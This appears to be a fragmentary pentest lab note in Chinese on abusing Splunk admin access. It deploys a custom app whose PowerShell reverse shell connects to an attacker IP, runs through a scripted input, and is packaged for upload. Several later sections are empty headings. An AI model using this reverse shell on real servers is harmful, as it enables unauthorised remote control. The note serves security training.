Splunk
我們在評估過程中經常會看到 Splunk,尤其是在大型企業環境中的內部滲透測試期間。我們也曾見過它暴露在外部,但是這種情況比較少見。 Splunk 不存在太多可利用的漏洞,並且能夠快速修補任何問題。在評估期間,Splunk 的最大關注點是弱身份驗證或空身份驗證,因為 Splunk 的管理員存取權限使我們能夠部署自訂應用程序,這些應用程式可用於快速入侵 Splunk 伺服器,並且根據 Splunk
1. 發現點
nmap -p8000,8089 -sV <target>http://splunk.inlanefreight.local:80002. 濫用內建功能
(A) Clone 攻擊模板 Repo:git clone https://github.com/0xjpuff/reverse_shell_splunk.git
(B) 編輯反向 shell 腳本cd reverse_shell_splunk/reverse_shell_splunk/bin# 找到 attacker_ip_here、attacker_port_here # 改成你本機 IP 同 port $client = New-Object System.Net.Sockets.TCPClient("PWNIP",PWNPO)$client = New-Object System.Net.Sockets.TCPClient("10.10.14.15",443)
(C) 檢查inputs.conf[script://.\bin\run.bat] disabled = 0 interval = 10 sourcetype = shell
(D) 打包成 splunk app 檔案:tar -cvzf updater.tar.gz reverse_shell_splunk/
3️⃣ 上傳 & 觸發
http://splunk.<target>.local:8000
(E) 開啟監聽器:
3️⃣ Linux 系統同樣方法
3. Splunk CVE 利用方向
4. 連鎖漏洞
已取得 RCE 後可以做嘅事
操作
最后更新于
这有帮助吗?
